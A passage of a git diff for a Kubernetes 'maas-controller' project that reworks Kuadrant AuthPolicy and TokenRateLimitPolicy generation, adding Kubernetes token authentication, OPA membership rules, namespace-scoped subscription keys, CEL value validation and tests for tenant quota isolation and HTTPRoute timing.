"-" + subscriptionName + "-" + modelName + "-tokens" + keyB := namespaceB + "-" + subscriptionName + "-" + modelName + "-tokens" + + if keyA == keyB { + t.Fatalf("SECURITY BUG: Limit keys are identical (%q), this would cause quota isolation bypass!", keyA) + } + + limitA, hasA := limitsMap[keyA] + limitB, hasB := limitsMap[keyB] + + if !hasA { + t.Errorf("Limit entry for tenant-a subscription not found, expected key %q, got keys: %v", keyA, getMapKeys(limitsMap)) + } + if !hasB { + t.Errorf("Limit entry for tenant-b subscription not found, expected key %q, got keys: %v", keyB, getMapKeys(limitsMap)) + } + + // Verify predicate includes namespace to prevent cross-tenant matching + // Format: auth.identity.selected_subscription_key == "{namespace}/{name}@{modelNamespace}/{modelName}" + if hasA { + limitAMap := limitA.(map[string]interface{}) + whenSlice, _, _ := unstructured.NestedSlice(limitAMap, "when") + if len(whenSlice) > 0 { + predMap := whenSlice[0].(map[string]interface{}) + pred := predMap["predicate"].(string) + expectedPredA := `auth.identity.selected_subscription_key == "` + namespaceA + "/" + subscriptionName + "@" + modelNamespace + "/" + modelName + `"` + if pred != expectedPredA { + t.Errorf("Tenant-a predicate = %q, want %q", pred, expectedPredA) + } + // CRITICAL: Predicate must NOT match tenant-b's subscription + if !containsString(pred, namespaceA) { + t.Errorf("SECURITY BUG: Tenant-a predicate doesn't include namespace: %s", pred) + } + } + } + + if hasB { + limitBMap := limitB.(map[string]interface{}) + whenSlice, _, _ := unstructured.NestedSlice(limitBMap, "when") + if len(whenSlice) > 0 { + predMap := whenSlice[0].(map[string]interface{}) + pred := predMap["predicate"].(string) + expectedPredB := `auth.identity.selected_subscription_key == "` + namespaceB + "/" + subscriptionName + "@" + modelNamespace + "/" + modelName + `"` + if pred != expectedPredB { + t.Errorf("Tenant-b predicate = %q, want %q", pred, expectedPredB) + } + // CRITICAL: 
Predicate must NOT match tenant-a's subscription + if !containsString(pred, namespaceB) { + t.Errorf("SECURITY BUG: Tenant-b predicate doesn't include namespace: %s", pred) + } + } + } + + // Verify both limit entries exist (no overwrite/collision) + if len(limitsMap) < 2 { + t.Errorf("Expected at least 2 limit entries (one per subscription), got %d: %v", len(limitsMap), getMapKeys(limitsMap)) + } +} + +// Helper function for test +func getMapKeys(m map[string]interface{}) []string { + keys := make([]string, 0, len(m)) + for k := range m { + keys = append(keys, k) + } + return keys +} + +func containsString(s, substr string) bool { + return len(s) >= len(substr) && findSubstringInString(s, substr) +} + +func findSubstringInString(s, substr string) bool { + for i := 0; i <= len(s)-len(substr); i++ { + if s[i:i+len(substr)] == substr { + return true + } + } + return false +} + // TestMaaSModelRefDeletion_CrossNamespaceIsolation verifies that deleting // a model in one namespace doesn't affect a same-named model in another namespace. 
func TestMaaSModelRefDeletion_CrossNamespaceIsolation(t *testing.T) { diff --git a/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go b/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go index a664b10a7..b205df4d9 100644 --- a/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go +++ b/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go @@ -18,8 +18,10 @@ package maas import ( "context" + "encoding/json" "errors" "fmt" + "sort" "strings" "github.com/go-logr/logr" @@ -58,13 +60,6 @@ type MaaSAuthPolicyReconciler struct { ClusterAudience string } -func (r *MaaSAuthPolicyReconciler) gatewayName() string { - if r.GatewayName != "" { - return r.GatewayName - } - return defaultGatewayName -} - func (r *MaaSAuthPolicyReconciler) clusterAudience() string { if r.ClusterAudience != "" { return r.ClusterAudience @@ -78,6 +73,7 @@ func (r *MaaSAuthPolicyReconciler) clusterAudience() string { //+kubebuilder:rbac:groups=maas.opendatahub.io,resources=maasmodelrefs,verbs=get;list;watch //+kubebuilder:rbac:groups=kuadrant.io,resources=authpolicies,verbs=get;list;watch;create;update;patch;delete //+kubebuilder:rbac:groups=gateway.networking.k8s.io,resources=httproutes,verbs=get;list;watch +//+kubebuilder:rbac:groups=config.openshift.io,resources=authentications,verbs=get // Reconcile is part of the main kubernetes reconciliation loop const maasAuthPolicyFinalizer = "maas.opendatahub.io/authpolicy-cleanup" @@ -142,18 +138,33 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex } continue } + if errors.Is(err, ErrHTTPRouteNotFound) { + // HTTPRoute doesn't exist yet - skip for now. HTTPRoute watch will trigger reconciliation when route is created. 
+ log.Info("HTTPRoute not found for model, skipping AuthPolicy creation", "model", ref.Namespace+"/"+ref.Name) + continue + } return nil, fmt.Errorf("failed to resolve HTTPRoute for model %s/%s: %w", ref.Namespace, ref.Name, err) } + // Validate model namespace and name for CEL injection prevention + if err := validateCELValue(ref.Namespace, "model namespace"); err != nil { + return nil, fmt.Errorf("invalid model namespace in modelRef %s/%s: %w", ref.Namespace, ref.Name, err) + } + if err := validateCELValue(ref.Name, "model name"); err != nil { + return nil, fmt.Errorf("invalid model name in modelRef %s/%s: %w", ref.Namespace, ref.Name, err) + } + // Find ALL auth policies for this model (not just the current one) allPolicies, err := findAllAuthPoliciesForModel(ctx, r.Client, ref.Namespace, ref.Name) if err != nil { return nil, fmt.Errorf("failed to list auth policies for model %s/%s: %w", ref.Namespace, ref.Name, err) } - // Aggregate membership conditions from ALL auth policies - // Using API key validation selectors (auth.metadata.apiKeyValidation.*) - var membershipConditions []interface{} + // Aggregate allowed groups and users from ALL auth policies + // Will be checked in OPA policy that handles both API keys and K8s tokens + // Initialize as empty slices (not nil) so json.Marshal produces [] instead of null + allowedGroups := []string{} + allowedUsers := []string{} var policyNames []string for _, ap := range allPolicies { policyNames = append(policyNames, ap.Name) @@ -161,23 +172,25 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex if err := validateCELValue(group.Name, "group name"); err != nil { return nil, fmt.Errorf("invalid subject in MaaSAuthPolicy %s: %w", ap.Name, err) } - membershipConditions = append(membershipConditions, map[string]interface{}{ - "operator": "incl", "selector": "auth.metadata.apiKeyValidation.groups", "value": group.Name, - }) + allowedGroups = append(allowedGroups, group.Name) } for _, user := 
range ap.Spec.Subjects.Users { if err := validateCELValue(user, "username"); err != nil { return nil, fmt.Errorf("invalid subject in MaaSAuthPolicy %s: %w", ap.Name, err) } - membershipConditions = append(membershipConditions, map[string]interface{}{ - "operator": "eq", "selector": "auth.metadata.apiKeyValidation.username", "value": user, - }) + allowedUsers = append(allowedUsers, user) } } + // Deduplicate and sort to ensure stable output across reconciles + // (Kubernetes List order is not guaranteed to be deterministic) + policyNames = deduplicateAndSort(policyNames) + allowedGroups = deduplicateAndSort(allowedGroups) + allowedUsers = deduplicateAndSort(allowedUsers) + // Construct API URLs using configured namespace apiKeyValidationURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/internal/v1/api-keys/validate", r.MaaSAPINamespace) - subscriptionSelectorURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/v1/subscriptions/select", r.MaaSAPINamespace) + subscriptionSelectorURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/internal/v1/subscriptions/select", r.MaaSAPINamespace) rule := map[string]interface{}{ "metadata": map[string]interface{}{ @@ -194,28 +207,31 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex "metrics": false, "priority": int64(0), }, - // Call subscription selector endpoint to determine user's subscription - // Priority 1 ensures this runs after apiKeyValidation (priority 0) + // Resolve subscription via maas-api + // For API keys: uses subscription bound to the key at mint time + // For K8s tokens: uses X-MaaS-Subscription header if provided, otherwise finds all accessible + // Priority 1 ensures this runs after apiKeyValidation (priority 0). 
"subscription-info": map[string]interface{}{ "http": map[string]interface{}{ "url": subscriptionSelectorURL, "contentType": "application/json", "method": "POST", "body": map[string]interface{}{ - "expression": `{ - "groups": auth.metadata.apiKeyValidation.groups, - "username": auth.metadata.apiKeyValidation.username, - "requestedSubscription": "x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : "" -}`, + "expression": fmt.Sprintf(`{ + "groups": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups, + "username": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.username : auth.identity.user.username, + "requestedSubscription": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.subscription : ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : ""), + "requestedModel": "%s/%s" +}`, ref.Namespace, ref.Name), }, }, - // Cache subscription selection results keyed by username, groups, and requested subscription. - // Key format: "username|groups-hash|requested-subscription" ensures different cache entries - // when the same user has different groups or requests different subscriptions. + // Cache subscription selection results keyed by username, groups, requested subscription, and model. + // Each model has its own cache entry since subscription validation is model-specific. + // Key format: "username|groups-hash|requested-subscription|model-namespace/model-name" // Groups are joined with commas to create a stable string representation. "cache": map[string]interface{}{ "key": map[string]interface{}{ - "selector": `auth.metadata.apiKeyValidation.username + "|" + auth.metadata.apiKeyValidation.groups.join(",") + "|" + ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : "")`, + "selector": fmt.Sprintf(`(auth.metadata.apiKeyValidation.valid == true ? 
auth.metadata.apiKeyValidation.username : auth.identity.user.username) + "|" + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups).join(",") + "|" + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.subscription : ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : "")) + "|%s/%s"`, ref.Namespace, ref.Name), }, "ttl": int64(60), }, @@ -225,54 +241,119 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex }, "authentication": map[string]interface{}{ // API Keys - plain authentication, actual validation in metadata layer + // Only processes tokens with sk-oai- prefix (OpenAI-compatible API keys) "api-keys": map[string]interface{}{ "plain": map[string]interface{}{ "selector": "request.headers.authorization", }, + "when": []interface{}{ + map[string]interface{}{ + "selector": "request.headers.authorization", + "operator": "matches", + "value": "^Bearer sk-oai-.*", + }, + }, "metrics": false, "priority": int64(0), }, + // Kubernetes/OpenShift tokens - validated via TokenReview API + // Only enabled for /v1/models endpoint (read-only model listing) + // Inferencing endpoints require API keys for billing/tracking + // The api-keys authentication (priority 0) runs first and will consume API key requests, + // so we don't need to explicitly exclude them here + "kubernetes-tokens": map[string]interface{}{ + "kubernetesTokenReview": map[string]interface{}{ + "audiences": []interface{}{r.clusterAudience()}, + }, + "when": []interface{}{ + map[string]interface{}{ + "selector": "request.url_path", + "operator": "matches", + "value": ".*/v1/models$", + }, + map[string]interface{}{ + "selector": "request.headers.authorization", + "operator": "neq", + "value": "", + }, + }, + "metrics": false, + "priority": int64(1), + }, }, } // Build authorization rules authRules := make(map[string]interface{}) - // Validate that API key is 
valid - authRules["api-key-valid"] = map[string]interface{}{ + // Validate authentication: API key must be valid, OR K8s token must be authenticated + // For API keys: check apiKeyValidation.valid == true (boolean) + // For K8s tokens: check that identity.username exists (TokenReview succeeded) + authRules["auth-valid"] = map[string]interface{}{ "metrics": false, "priority": int64(0), - "patternMatching": map[string]interface{}{ - "patterns": []interface{}{ - map[string]interface{}{ - "selector": "auth.metadata.apiKeyValidation.valid", - "operator": "eq", - "value": "true", - }, - }, + "opa": map[string]interface{}{ + "rego": `# API key authentication: validate the key +allow { + object.get(input.auth.metadata, "apiKeyValidation", {}) + input.auth.metadata.apiKeyValidation.valid == true +} + +# Kubernetes token authentication: check identity exists +allow { + object.get(input.auth.identity, "user", {}).username != "" +}`, }, } - // Check for subscription selection errors and deny if present - authRules["subscription-error-check"] = map[string]interface{}{ + // Fail-close: require successful subscription selection (name must be present) + authRules["subscription-valid"] = map[string]interface{}{ "metrics": false, "priority": int64(0), "opa": map[string]interface{}{ - "rego": `allow { not object.get(input.auth.metadata["subscription-info"], "error", false) }`, + "rego": `allow { object.get(input.auth.metadata["subscription-info"], "name", "") != "" }`, }, } // Build aggregated authorization rule from ALL auth policies' subjects - if len(membershipConditions) > 0 { - var patterns []interface{} - if len(membershipConditions) == 1 { - patterns = membershipConditions - } else { - patterns = []interface{}{map[string]interface{}{"any": membershipConditions}} - } + // Uses OPA to check membership for both API keys and K8s tokens + if len(allowedGroups) > 0 || len(allowedUsers) > 0 { + groupsJSON, _ := json.Marshal(allowedGroups) + usersJSON, _ := json.Marshal(allowedUsers) 
authRules["require-group-membership"] = map[string]interface{}{ - "metrics": false, "priority": int64(0), - "patternMatching": map[string]interface{}{"patterns": patterns}, + "metrics": false, + "priority": int64(0), + "opa": map[string]interface{}{ + "rego": fmt.Sprintf(` +# Allowed groups and users from all MaaSAuthPolicies +allowed_groups := %s +allowed_users := %s + +# Extract username from API key or K8s token +username := input.auth.metadata.apiKeyValidation.username + { object.get(input.auth, "metadata", {}).apiKeyValidation.username != "" } +else := input.auth.identity.user.username + { object.get(input.auth, "identity", {}).user.username != "" } +else := "" + +# Extract groups from API key or K8s token +groups := input.auth.metadata.apiKeyValidation.groups + { object.get(input.auth, "metadata", {}).apiKeyValidation.groups != [] } +else := input.auth.identity.user.groups + { object.get(input.auth, "identity", {}).user.groups != [] } +else := [] + +# Allow if user is in allowed users +allow { + username == allowed_users[_] +} + +# Allow if any user group is in allowed groups +allow { + groups[_] == allowed_groups[_] +} +`, string(groupsJSON), string(usersJSON)), + }, } } @@ -283,30 +364,40 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex // Pass ALL user groups unfiltered in the response so TokenRateLimitPolicy predicates can // match against subscription groups (which may differ from auth policy groups). // Also inject subscription metadata from subscription-info for Limitador metrics. - // Groups and username come from API key validation. 
+ // For API keys: username/groups come from apiKeyValidation metadata + // For K8s tokens: username/groups come from auth.identity rule["response"] = map[string]interface{}{ "success": map[string]interface{}{ "headers": map[string]interface{}{ - // Username from API key validation + // Username from API key validation or K8s token identity "X-MaaS-Username": map[string]interface{}{ "plain": map[string]interface{}{ - "selector": "auth.metadata.apiKeyValidation.username", + "expression": `auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.username : auth.identity.user.username`, }, "metrics": false, "priority": int64(0), }, - // Groups - construct JSON array string from API key validation groups + // Groups - construct JSON array string from API key validation or K8s identity "X-MaaS-Group": map[string]interface{}{ "plain": map[string]interface{}{ - "expression": `'["' + auth.metadata.apiKeyValidation.groups.join('","') + '"]'`, + "expression": `'["' + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups).join('","') + '"]'`, }, "metrics": false, "priority": int64(0), }, - // Key ID for tracking + // Key ID for tracking (only for API keys) "X-MaaS-Key-Id": map[string]interface{}{ "plain": map[string]interface{}{ - "selector": "auth.metadata.apiKeyValidation.keyId", + "expression": `auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.keyId : ""`, + }, + "metrics": false, + "priority": int64(0), + }, + // Subscription bound to API key (only for API keys) + // For K8s tokens, this header is not injected (empty string) + "X-MaaS-Subscription": map[string]interface{}{ + "plain": map[string]interface{}{ + "expression": `auth.metadata.apiKeyValidation.valid == true ? 
auth.metadata.apiKeyValidation.subscription : ""`, }, "metrics": false, "priority": int64(0), @@ -324,10 +415,17 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex "keyId": map[string]interface{}{ "selector": "auth.metadata.apiKeyValidation.keyId", }, - // Subscription metadata from /v1/subscriptions/select endpoint + // Subscription metadata from /internal/v1/subscriptions/select endpoint "selected_subscription": map[string]interface{}{ "expression": `has(auth.metadata["subscription-info"].name) ? auth.metadata["subscription-info"].name : ""`, }, + // Model-scoped subscription key for TRLP isolation: namespace/name@modelNamespace/modelName + "selected_subscription_key": map[string]interface{}{ + "expression": fmt.Sprintf( + `has(auth.metadata["subscription-info"].namespace) && has(auth.metadata["subscription-info"].name) ? auth.metadata["subscription-info"].namespace + "/" + auth.metadata["subscription-info"].name + "@%s/%s" : ""`, + ref.Namespace, ref.Name, + ), + }, "organizationId": map[string]interface{}{ "expression": `has(auth.metadata["subscription-info"].organizationId) ? auth.metadata["subscription-info"].organizationId : ""`, }, @@ -459,8 +557,6 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex // deleteModelAuthPolicy deletes the aggregated AuthPolicy for a model in the given namespace. func (r *MaaSAuthPolicyReconciler) deleteModelAuthPolicy(ctx context.Context, log logr.Logger, modelNamespace, modelName string) error { - // Check if there are any remaining (non-deleted) MaaSAuthPolicies that reference this model. - // If yes, don't delete the aggregated AuthPolicy - they will rebuild it. // Always delete the aggregated AuthPolicy so remaining MaaSAuthPolicies rebuild it // without the subjects from the deleted policy. If we skip deletion, the aggregated // AuthPolicy will contain stale subjects from the deleted MaaSAuthPolicy. 
@@ -691,3 +787,24 @@ func (r *MaaSAuthPolicyReconciler) mapHTTPRouteToMaaSAuthPolicies(ctx context.Co } return requests } +// deduplicateAndSort removes duplicates from a string slice and sorts it. +// This ensures stable output across reconciles, preventing spurious updates +// caused by non-deterministic Kubernetes List order. +func deduplicateAndSort(items []string) []string { + if len(items) == 0 { + return items + } + // Use a map to deduplicate + seen := make(map[string]bool, len(items)) + for _, item := range items { + seen[item] = true + } + // Build deduplicated slice + result := make([]string, 0, len(seen)) + for item := range seen { + result = append(result, item) + } + // Sort for deterministic output + sort.Strings(result) + return result +} diff --git a/maas-controller/pkg/controller/maas/maasmodelref_controller.go b/maas-controller/pkg/controller/maas/maasmodelref_controller.go index 5a4b97d1a..343a24143 100644 --- a/maas-controller/pkg/controller/maas/maasmodelref_controller.go +++ b/maas-controller/pkg/controller/maas/maasmodelref_controller.go @@ -82,6 +82,7 @@ func (r *MaaSModelRefReconciler) gatewayNamespace() string { //+kubebuilder:rbac:groups=gateway.networking.k8s.io,resources=gateways,verbs=get;list;watch //+kubebuilder:rbac:groups=kuadrant.io,resources=authpolicies,verbs=get;list;watch;create;update;patch;delete //+kubebuilder:rbac:groups=serving.kserve.io,resources=llminferenceservices,verbs=get;list;watch +//+kubebuilder:rbac:groups="",resources=secrets,verbs=get const maasModelFinalizer = "maas.opendatahub.io/model-cleanup" @@ -138,6 +139,13 @@ func (r *MaaSModelRefReconciler) Reconcile(ctx context.Context, req ctrl.Request r.updateStatusWithReason(ctx, model, "Failed", fmt.Sprintf("kind not implemented: %s", kind), "Unsupported", statusSnapshot) return ctrl.Result{}, nil } + if errors.Is(err, ErrHTTPRouteNotFound) { + // HTTPRoute doesn't exist yet - this is normal during startup. + // Set status to Pending (not Failed). 
The HTTPRoute watch will trigger reconciliation when the route is created. + model.Status.Endpoint = "" + r.updateStatus(ctx, model, "Pending", "Waiting for HTTPRoute to be created", statusSnapshot) + return ctrl.Result{}, nil + } log.Error(err, "failed to reconcile HTTPRoute") r.updateStatus(ctx, model, "Failed", fmt.Sprintf("Failed to reconcile HTTPRoute: %v", err), statusSnapshot) return ctrl.Result{}, err diff --git a/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go b/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go index 70f7260f0..863a128ff 100644 --- a/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go +++ b/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go @@ -510,6 +510,63 @@ func TestLlmisvcReadyChangedPredicate(t *testing.T) { }) } +// TestMaaSModelRefReconciler_HTTPRouteRaceCondition verifies that MaaSModelRef reliably +// reaches Ready state when HTTPRoute is created after the MaaSModelRef (common during startup). 
+func TestMaaSModelRefReconciler_HTTPRouteRaceCondition(t *testing.T) { + ctx := context.Background() + const ( + modelName = "test-model" + llmisvcName = "test-llmisvc" + ns = "default" + ) + + // Start with MaaSModelRef and ready LLMInferenceService, but NO HTTPRoute + llmisvc := newLLMISvc(llmisvcName, ns, corev1.ConditionTrue) + model := newMaaSModelRef(modelName, ns, "LLMInferenceService", llmisvcName) + r, c := newTestReconciler(model, llmisvc) + req := ctrl.Request{NamespacedName: types.NamespacedName{Name: modelName, Namespace: ns}} + + // --- Phase 1: Reconcile without HTTPRoute -> should enter Pending --- + + result, err := r.Reconcile(ctx, req) + if err != nil { + t.Fatalf("Reconcile (no HTTPRoute): %v", err) + } + if result.Requeue || result.RequeueAfter != 0 { + t.Errorf("expected no requeue when HTTPRoute not found (watch handles it), got: %v", result) + } + + got := &maasv1alpha1.MaaSModelRef{} + if err := c.Get(ctx, req.NamespacedName, got); err != nil { + t.Fatalf("Get after first reconcile: %v", err) + } + if got.Status.Phase != "Pending" { + t.Errorf("Phase after first reconcile = %q, want Pending (HTTPRoute doesn't exist yet)", got.Status.Phase) + } + assertReadyCondition(t, got.Status.Conditions, metav1.ConditionFalse, "BackendNotReady") + + // --- Phase 2: KServe creates HTTPRoute -> model should become Ready on re-reconcile --- + + route := newLLMISvcRoute(llmisvcName, ns) + if err := c.Create(ctx, route); err != nil { + t.Fatalf("Create HTTPRoute: %v", err) + } + + // Reconcile again (triggered by HTTPRoute watch) + if _, err := r.Reconcile(ctx, req); err != nil { + t.Fatalf("Reconcile (with HTTPRoute): %v", err) + } + + final := &maasv1alpha1.MaaSModelRef{} + if err := c.Get(ctx, req.NamespacedName, final); err != nil { + t.Fatalf("Get after HTTPRoute created: %v", err) + } + if final.Status.Phase != "Ready" { + t.Errorf("Phase after HTTPRoute created = %q, want Ready", final.Status.Phase) + } + assertReadyCondition(t, 
final.Status.Conditions, metav1.ConditionTrue, "Reconciled") +} + // TestMaaSModelRefReconciler_DuplicateReconciliation verifies that reconciling the same // MaaSModelRef twice does not produce a redundant status update when nothing has changed. func TestMaaSModelRefReconciler_DuplicateReconciliation(t *testing.T) { diff --git a/maas-controller/pkg/controller/maas/maassubscription_controller.go b/maas-controller/pkg/controller/maas/maassubscription_controller.go index d92a64eb5..4f57bc871 100644 --- a/maas-controller/pkg/controller/maas/maassubscription_controller.go +++ b/maas-controller/pkg/controller/maas/maassubscription_controller.go @@ -33,10 +33,12 @@ import ( "k8s.io/apimachinery/pkg/runtime" "k8s.io/apimachinery/pkg/runtime/schema" "k8s.io/apimachinery/pkg/types" + "k8s.io/client-go/util/workqueue" ctrl "sigs.k8s.io/controller-runtime" "sigs.k8s.io/controller-runtime/pkg/builder" "sigs.k8s.io/controller-runtime/pkg/client" "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil" + "sigs.k8s.io/controller-runtime/pkg/event" "sigs.k8s.io/controller-runtime/pkg/handler" "sigs.k8s.io/controller-runtime/pkg/predicate" "sigs.k8s.io/controller-runtime/pkg/reconcile" @@ -58,6 +60,10 @@ type MaaSSubscriptionReconciler struct { const maasSubscriptionFinalizer = "maas.opendatahub.io/subscription-cleanup" +// ConditionSpecPriorityDuplicate is set True when another MaaSSubscription shares the same spec.priority +// (API key mint and selector use deterministic tie-break; admins should set distinct priorities). 
+const ConditionSpecPriorityDuplicate = "SpecPriorityDuplicate" + // Reconcile is part of the main kubernetes reconciliation loop func (r *MaaSSubscriptionReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) { log := logr.FromContextOrDiscard(ctx).WithValues("MaaSSubscription", req.NamespacedName) @@ -112,6 +118,11 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context } continue } + if errors.Is(err, ErrHTTPRouteNotFound) { + // HTTPRoute doesn't exist yet - skip for now. HTTPRoute watch will trigger reconciliation when route is created. + log.Info("HTTPRoute not found for model, skipping TokenRateLimitPolicy creation", "model", modelRef.Namespace+"/"+modelRef.Name) + continue + } return fmt.Errorf("failed to resolve HTTPRoute for model %s/%s: %w", modelRef.Namespace, modelRef.Name, err) } @@ -122,16 +133,12 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context } limitsMap := map[string]interface{}{} - var allGroupNames, allUserNames []string var subNames []string type subInfo struct { - sub maasv1alpha1.MaaSSubscription - mRef maasv1alpha1.ModelSubscriptionRef - groupNames []string - userNames []string - rates []interface{} - maxLimit int64 + sub maasv1alpha1.MaaSSubscription + mRef maasv1alpha1.ModelSubscriptionRef + rates []interface{} } var subs []subInfo for _, sub := range allSubs { @@ -139,136 +146,54 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context if mRef.Namespace != modelRef.Namespace || mRef.Name != modelRef.Name { continue } - var groupNames []string - for _, group := range sub.Spec.Owner.Groups { - if err := validateCELValue(group.Name, "group name"); err != nil { - return fmt.Errorf("invalid owner in MaaSSubscription %s: %w", sub.Name, err) - } - groupNames = append(groupNames, group.Name) - } - var userNames []string - for _, user := range sub.Spec.Owner.Users { - if err := validateCELValue(user, "username"); err != nil { - 
return fmt.Errorf("invalid owner in MaaSSubscription %s: %w", sub.Name, err) - } - userNames = append(userNames, user) - } var rates []interface{} - var maxLimit int64 if len(mRef.TokenRateLimits) > 0 { for _, trl := range mRef.TokenRateLimits { rates = append(rates, map[string]interface{}{"limit": trl.Limit, "window": trl.Window}) - if trl.Limit > maxLimit { - maxLimit = trl.Limit - } } } else { rates = append(rates, map[string]interface{}{"limit": int64(100), "window": "1m"}) - maxLimit = 100 } - subs = append(subs, subInfo{sub: sub, mRef: mRef, groupNames: groupNames, userNames: userNames, rates: rates, maxLimit: maxLimit}) + subs = append(subs, subInfo{sub: sub, mRef: mRef, rates: rates}) break } } - // Sort subscriptions by maxLimit descending (highest tier first). - sort.Slice(subs, func(i, j int) bool { return subs[i].maxLimit > subs[j].maxLimit }) - - // Helper: build a compact CEL predicate that checks if the user belongs to - // any of the given groups or matches any of the given usernames. Uses a single - // exists() call for groups (e.g. exists(g, g == "a" || g == "b")) instead of - // N separate exists() calls, keeping predicates short at scale. - buildMembershipCheck := func(groups, users []string) string { - var parts []string - if len(groups) > 0 { - var comparisons []string - for _, g := range groups { - comparisons = append(comparisons, fmt.Sprintf(`g == "%s"`, g)) - } - parts = append(parts, fmt.Sprintf(`auth.identity.groups_str.split(",").exists(g, %s)`, strings.Join(comparisons, " || "))) - } - for _, u := range users { - parts = append(parts, fmt.Sprintf(`auth.identity.userid == "%s"`, u)) - } - return strings.Join(parts, " || ") - } - - headerCheck := `request.headers["x-maas-subscription"]` - headerExists := `request.headers.exists(h, h == "x-maas-subscription")` - - for i, si := range subs { + // Trust auth.identity.selected_subscription_key from AuthPolicy. 
+ // AuthPolicy has already validated subscription selection via /internal/v1/subscriptions/select, + // which handles: + // - Validating subscription exists and user has access (groups/users match) + // - Auto-selecting if user has exactly one subscription + // - Returning 403 Forbidden for invalid scenarios (wrong header, no access, multiple without header) + // TokenRateLimitPolicy simply applies the rate limit for the validated subscription. + // + // The selected_subscription_key format is: {subNamespace}/{subName}@{modelNamespace}/{modelName} + // This ensures proper isolation between subscriptions in different namespaces and across models. + for _, si := range subs { subNames = append(subNames, si.sub.Name) - allGroupNames = append(allGroupNames, si.groupNames...) - allUserNames = append(allUserNames, si.userNames...) - membershipCheck := buildMembershipCheck(si.groupNames, si.userNames) - if membershipCheck == "" { - log.Info("skipping subscription with no owner groups/users — rate limit would be unreachable", - "subscription", si.sub.Name, "model", si.mRef.Name) - continue - } - - // Collect higher-tier groups/users for exclusions - var excludeGroups, excludeUsers []string - for j := 0; j < i; j++ { - excludeGroups = append(excludeGroups, subs[j].groupNames...) - excludeUsers = append(excludeUsers, subs[j].userNames...) - } - - // Build branch selection: explicit header OR auto-select with exclusions. - explicitBranch := fmt.Sprintf(`%s == "%s"`, headerCheck, si.sub.Name) - autoBranch := "!" 
+ headerExists - if exclusionCheck := buildMembershipCheck(excludeGroups, excludeUsers); exclusionCheck != "" { - autoBranch += " && !(" + exclusionCheck + ")" - } + // Build subscription reference: namespace/name + subRef := fmt.Sprintf("%s/%s", si.sub.Namespace, si.sub.Name) + // Build model-scoped reference: subscription@model + modelScopedRef := fmt.Sprintf("%s@%s/%s", subRef, si.mRef.Namespace, si.mRef.Name) - limitsMap[fmt.Sprintf("%s-%s-tokens", si.sub.Name, si.mRef.Name)] = map[string]interface{}{ + // TRLP limit key must be safe for YAML (no slashes) + safeKey := strings.ReplaceAll(subRef, "/", "-") + limitsMap[fmt.Sprintf("%s-%s-tokens", safeKey, si.mRef.Name)] = map[string]interface{}{ "rates": si.rates, "when": []interface{}{ - map[string]interface{}{"predicate": membershipCheck}, - map[string]interface{}{"predicate": explicitBranch + " || (" + autoBranch + ")"}, + map[string]interface{}{ + "predicate": fmt.Sprintf(`auth.identity.selected_subscription_key == "%s"`, modelScopedRef), + }, }, "counters": []interface{}{ map[string]interface{}{"expression": "auth.identity.userid"}, }, } - - // Deny users who explicitly select this subscription but don't belong to it. - limitsMap[fmt.Sprintf("deny-not-member-%s-%s", si.sub.Name, si.mRef.Name)] = map[string]interface{}{ - "rates": []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}}, - "when": []interface{}{ - map[string]interface{}{"predicate": explicitBranch}, - map[string]interface{}{"predicate": "!(" + membershipCheck + ")"}, - }, - "counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}}, - } } - // Deny-unsubscribed: user is not in ANY subscription group/user list. 
